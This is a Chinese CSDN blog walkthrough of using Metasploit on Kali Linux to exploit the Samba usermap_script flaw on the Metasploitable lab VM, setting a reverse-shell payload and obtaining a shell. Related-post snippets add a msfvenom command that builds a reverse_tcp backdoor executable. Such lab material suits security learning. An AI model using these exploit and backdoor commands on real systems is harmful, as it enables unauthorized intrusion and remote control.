kali使用MSF渗透metasploitable

最新推荐文章于 2024-04-22 17:09:59 发布
最新推荐文章于 2024-04-22 17:09:59 发布
阅读量1k 收藏 3
点赞数
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MOONYOUS/article/details/106558509
版权

环境:kali Linux 和metasploitalbe
metasploitable下载后解压即可打开运行
smba是一款免费的在linux和unix共享文件夹的软件,其中的SMB协议是通信协议 在msfconsole中输入 search samba 查看相关漏洞利用模块
在这里插入图片描述
输入

 use exploit/multi/samba/usermap_script

在这里插入图片描述
选择一个payload 反向攻击载荷模块

set payload cmd/unix/reverse

设置双方ip 对方445端口 后执行run或者exploit
在这里插入图片描述
拿到shell
上四个问题
你是谁 你的名字 你的密码 你的shell名
在这里插入图片描述

MOONYOUS
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali msf教程
08-24
kali linux msf系列教程
kali 渗透msf
11-14
kali渗透测试利器
初识MSF-Metasploit(一)
songbai220
10-21 1023
什么是Metasploit Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布MSF时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 2655
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用
kali学习4——使用msfvenom制作exe木马
不会心跳的博客
01-29 5546
使用msfvenom制作exe木马文件 1. msfvenom msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是,木马在目标机上执行后,向本机发送信息,而本机则需要开启监听状态,收到信息后则进行连接。 2. 制作木马 msfvenom制作木马需要的参数很多: root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement
msf使用方法 kali 2022.4
tairitian888的博客
06-21 333
打开 msfconsole show exploits 查看全部攻击代码 show auxiliary 查看全部攻击辅助工具 show payloads 查看某一模块所适用的攻击代码 show targets 查看某一模块适用的攻击目标 search 搜索 search cve 搜索cve的第三位编号 以利用cve漏洞 exit 退出msf use 使用攻击模块 info–显示某模块的详细信息 set/unset – 设置/禁用模块中的某个参数 set ...
利用kali下的msfvenom入侵电脑
热门推荐
qq_41453632的博客
10-28 3万+
需要的工具:msfvenom . msfconsole (kali里面有) msfvenom  -p  windows/meterpreter/reverse_tcp  LHOST=本地ip  LPORT=本地端口号 –f exe –o 文件名.exe 即生成一个后门文件xss.exe(我这里是将文件名命名为xss的) 然后继续执行命令: msfconsole          (...
kali linux msf系列视频教程
10-25
kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器漏洞提权 kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf ...
70-70.渗透测试-kali更新msf.mp4
最新发布
05-10
70-70.渗透测试-kali更新msf.mp4
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
kali2.0第一次启动msf
Reset
04-16 9447
msfMetasploit Framework,可以用来漏洞利用。漏洞探测等功能,是一个非常好的工具。 第一次使用msf: ①、先启动postgresql数据库,这个是msf 的默认数据库。 service postgresql start 或者 /etc/init.d/postgresql start ②、第一次用所以需要初始化数据库 postgresql enable ③、...
如何更新msf及其结构
10-08
更新msf 及其结构 exploit framework 的利用 很不错的哦
看完这篇 教你玩转渗透测试靶机——Metasploitable2
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
kali中安装使用msfconsole
wyzhxhn的博客
10-25 8084
msfconsole安装
网络安全:kaliMSF工具基本使用方法
Mr_qing的博客
10-08 5099
1、进入MSF工具:nsfconsole 2、查询漏洞利用工具:search 漏洞编号 3、打开工具:use 工具id 4、查看工具配置参数:show options 5、查看工具的详细信息:info 6、配置参数: set 参数头 目标主机 set 参数头 目标端口 (参数配置根据实际所缺参数为准) 7、运行工具:run或者exploit @返回命令:back @新版kali已经自动配置Payload;不需要再次自己配置(当然也可以自己配置:set payload windows/***/…
KALIMSF使用
Linux_get的博客
03-11 999
记录学习一次Linux
Kali Linux 学习日记4 -MetasploitMSF)和 Nessus
qq_46081990的博客
03-06 1268
为了利用一个vulnerability(系统存在的漏洞),通常需要一个exploit(利用漏洞的代码)。exploit可以利用vulnerability,提供目标主机的权限。exploit通常会向目标发送payload(攻击成功后向目标传递的恶意代码),以此来获取目标主机的权限。payload通常由exploit来传递到目标系统上。Metasploit是一个漏洞框架。全称为The Metasploit Framework,简称MSF。它允许使用者开发自己的漏洞脚本(ruby语言),然后进行测试。
kali虚拟机-----破解wifi密码(WiFi渗透
weixin_46471800的博客
08-10 7991
文章目录一、将无线网卡挂载到 虚拟机上二、查看是否挂载成功三、查看网卡是否支持监听模式四、检查文件监听影响并杀死影响五、开启无线监听模式六、开始监听七、开始抓包(新建一个命令窗口)八、对已连接的终端进行攻击,使它掉线重连,以此来获取数据包。(新建一个命令窗口)九、开始解密 一、将无线网卡挂载到 虚拟机上 可能出现的问题:在可移动设备处无法连接无线网卡; 解决:在虚拟机设置中将usb控制器设置成如图所示。 注意要先关闭虚拟机在设置。 二、查看是否挂载成功 使用ifconfig命令查看 三、查看网卡是
kali渗透metasploitable2
06-06
Kali渗透是指使用Kali Linux操作系统进行渗透测试,而Metasploitable 2是一个虚拟机映像,旨在提供一个易于使用的目标,以进行渗透测试和漏洞研究。使用Kali渗透Metasploitable 2可以帮助安全专业人员测试自己的网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值